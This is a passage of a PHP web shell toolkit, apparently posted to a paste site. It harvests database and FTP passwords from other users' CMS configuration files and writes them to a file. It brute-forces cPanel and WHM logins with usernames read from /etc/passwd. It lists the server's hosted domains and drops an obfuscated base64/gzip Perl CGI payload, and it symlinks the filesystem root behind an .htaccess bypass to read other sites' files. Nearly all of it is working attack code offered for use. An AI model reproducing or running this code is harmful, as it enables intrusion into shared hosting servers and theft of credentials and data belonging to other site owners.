- $dbp=entre2v2($content,"ftp_pass = '","';");
- $dbu=entre2v2($content,"ftp_user = '","';");
- if(!empty($dbp))
- echo "ftp user is ==> ". $dbu=entre2v2($content,"ftp_user = '","';");
- echo "<br>ftp password is ==> ". $dbp=entre2v2($content,"ftp_pass = '","';");
- $pass=$dbu." ".$dbp."\n";
- fwrite($ffile,$pass);
- }
- }
- }
- ////////////////
- // other cms ///
- ///////////////
- if($check == "other")
- {
- $otherc=array("..config","..admin-conf");
- foreach($otherc as $othercon)
- {
- $finalurl=$re.$usersss.$othercon;
- $content=data($finalurl);
- if($content && preg_match('/DB_DATABASE/i',$content))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms for user $usersss </font></td></tr></table>";
- echo "mysql server password ==> ". $dbp=entre2v2($content,"DB_PASSWORD', '","');");
- if(!empty($dbp))
- $pass=$dbp."\n";
- fwrite($ffile,$pass);
- }
- elseif($content && preg_match('/dbpass/i',$content))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
- echo $db=entre2v2($content,"dbpass = '","';");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- elseif($content && preg_match('/dbpass/i',$content))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms of user $usersss </font></td></tr></table>";
- echo $db=entre2v2($content,"dbpass = '","';");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- elseif($content && preg_match('/dbpass/i',$content))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
- echo $db=entre2v2($content,"dbpass = \"","\";");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- }
- }
- }
- }
- }
- else{
- echo "<p>aapne pani jayada pee liya h =)), aap nashe may ho bhaiyu, please checkmark config files ";
- }
- }
- ?>
- <?php
- /////////////////////////////////
- ///// cpanel cracker ///////
- /////////////////////////////////
- ?>
- <form method=post>
- <input type=submit name=cpanel value="Auto username/password loading cpanel cracker"><p>
- <?php
- if(isset($_POST['cpanel']))
- {
- ?>
- <form method=post><div align=center><table>
- want to brute=><select name="op"> <option name="op" value="cp">CPanel</option>
- <option name="op" value="whm">WHMPanel</option></table><p>
- <textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
- foreach($users as $user)
- {
- $str=explode(":",$user);
- echo $str[0]."\n";
- }
- ?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
- <?php
- $d=getcwd()."/P-list.txt";
- $pf=file($d);
- foreach($pf as $rt)
- {
- $str=explode('\n',$rt);
- echo trim($str[0])."\n";
- } ?></textarea><p>
- <input type=submit name=cpanelcracking value="Start"></form>
- <?php
- }
- ?>
- <?php
- error_reporting(0);
- $connect_timeout=5;
- set_time_limit(0);
- $userl=$_POST['usernames'];
- $passl=$_POST['passwords'];
- $attack=$_POST['op'];
- $target = "localhost";
- if(isset($_POST['cpanelcracking']))
- {
- if($userl!=="" && $passl!=="")
- {
- if($_POST["op"]=="cp")
- {
- $cracked=$_POST['crack'];
- @fopen($cracked,'a');
- echo "now we are attacking cpanels....please wait till the end of process \n";
- }
- elseif($_POST["op"]=="whm")
- {
- @fopen($cracked,'a');
- echo "now we are attacking WHM panel....please wait till the end of process";
- }
- function cpanel($host,$user,$pass,$timeout){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
- curl_setopt($ch, CURLOPT_FAILONERROR, 1);
- $data = curl_exec($ch);
- if ( curl_errno($ch) == 0 ){
- echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
- }
- curl_close($ch);}
- $userlist=explode("\n",$userl);
- $passlist=explode("\n",$passl);
- if ($attack == "cp")
- {
- foreach ($userlist as $user) {
- echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
- $finaluser = trim($user);
- foreach ($passlist as $password ) {
- $finalpass = trim($password);
- cpanel($target,$finaluser,$finalpass,$connect_timeout);
- }
- }
- }
- function whm($host,$user,$pass,$timeout){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
- curl_setopt($ch, CURLOPT_FAILONERROR, 1);
- $data = curl_exec($ch);
- if ( curl_errno($ch) == 0 ){
- echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
- }
- curl_close($ch);}
- $userlist=explode("\n",$userl);
- $passlist=explode("\n",$passl);
- if ($attack == "whm")
- {
- foreach ($userlist as $user) {
- echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
- $finaluser = trim($user);
- foreach ($passlist as $password ) {
- $finalpass = trim($password);
- whm($target,$finaluser,$finalpass,$connect_timeout);
- }
- }
- }
- }
- elseif($userl=="")
- {
- echo "what are you doing :( , you have left userlist field empty";
- }
- elseif($passl=="")
- {
- echo "please put passwords in paasword list field";
- }
- }
- ?>
- <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms">
- <form method=post><font color=white size=2 face="comic sans ms">extract domain names by valiases</font><br>
- <input type=submit name=domain value="cat /etc/valiases/" /></form>
- <?php
- if(isset($_POST['domain']))
- {
- $yamsites=@file("/etc/named.conf");
- if(!$yamsites)
- {
- die('<script>alert("r00t@group:~# /etc/named.conf Not Found!!!")</script>');
- }
- echo "<div class=container><br /><center><font color=orange size=3 face=\"comic sans ms\">Total Domanis Found: </font><font color=red>".count($yamsites)."</font><br /><br /><table align=center border=1 width=59% cellpadding=5><tr><td>Domains</td><td>Users</td><td>Directory</font></td></tr>";
- foreach($yamsites as $yamprog)
- {
- if(eregi("zone", $yamprog))
- {
- preg_match_all('#zone "(.*)" #', $yamprog, $yamzone);
- flush();
- if(strlen(trim($yamzone[1][0]))>2)
- {
- $user=posix_getpwuid(@fileowner("/etc/valiases/".$yamzone[1][0]));
- echo "<tr><td><a href=http://www.".$yamzone[1][0]." target=_blank>".$yamzone[1][0]."</a><td>".$user['name']."
- </td><td><a href=/group.txt/root/home/".$user['name']."/public_html/ target=_blank>SymLink</a></td></tr>";
- flush();
- }
- }
- }
- echo '</table></div></body>';
- }
- ?>
- <div align=center><table width=100% border=1><tr><td align=center></td></tr></table>
- <font color=white size=4 face="comic sans ms">Perl based symlink ;)<br><form method=post>
- <input type=submit name=passx value="cat /etc/passwd"><p></form>
- <?php
- if(isset($_POST['passx']))
- {
- ?>
- <textarea style="background:black;color:white" rows=20 cols=50 name=usernames ><?php $users=file("/etc/passwd");
- foreach($users as $user)
- {
- $str=explode("\n",$user);
- echo $str[0]."\n";
- }
- ?></textarea>
- <?php
- }
- ?>
- <form method=post>
- <font size=5 color=white>==[[ <input type=submit name=perl value="Perl based ln -s \m/"> ]]==</font></form>
- <p>
- <?php
- if(isset($_POST['perl']))
- {
- error_reporting(0);
- $da='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';
- $decryp=gzinflate(base64_decode($da));
- mkdir('perl', 0777);
- $hope = fopen("perl/.htaccess", 'w');
- $hcon= "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .root\nAddHandler cgi-script .root\nAddHandler cgi-script .root";
- fwrite ( $hope, $hcon ) ;
- $pelfile = fopen("perl/in.root" ,"w");
- fwrite ($pelfile,$decryp);
- chmod("perl/in.root",0755);
- echo "<iframe src=perl/in.root width=50% height=70% ></iframe><br><br> ";
- echo "<font size=4>check in this directory for configuration files once you have done with this script<br><a href=perl/><u>yahaan Group-XP yahaan :)</u></a></font>";
- }
- ?>
- <table width=100% border=1><tr><td align=center></td></tr></table>
- <font color=#00ff00 size=4>==[[ Cant read /etc/named.conf bypasser ]]==</font>
- <form method=post>
- <input type=submit name="ms" value="What are you waiting for " /></form>
- <?php
- if(isset($_POST['ms']))
- {
- error_reporting(0);
- $cmd="ls /var/named";
- $r=shell_exec($cmd);
- mkdir('groupshell',0777);
- $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
- $f = fopen('groupshell/.htaccess','w');
- $groupshell = symlink("/","groupshell/root");
- fwrite($f , $rr);
- ?><form method=post><textarea rows=1 cols=1 name=web><?php echo $r;?></textarea><br><input type=submit name=w value="one more time bhaiyu ^_^ " />
- </form>
- <?php
- }
- error_reporting(0);
- $webs=explode("\n",$_POST['web']);
- if(isset($_POST['w']))
- {
- $webs=explode("\n",$_POST['web']);
- echo "<table width=40% align=center border=1>
- <tr><td align=center>Websites</td><td align=center>usernames</td><td>symlink</td></tr>";
- foreach($webs as $f)
- {
- $str=substr_replace($f,"",-4);
- $user = posix_getpwuid(@fileowner("/etc/valiases/".$str));
- echo "<table border=1 width=40%><tr><td align=center><font color=red>".$str."</font></td><td align=center><font color=white>".$user['name']."</td><td><a href=groupshell/root/home/".$user['name']."/public_html/>spin the shit </a></tr></table>"; flush();
- }
- }
- ?>
Add Comment
Please, Sign In to add comment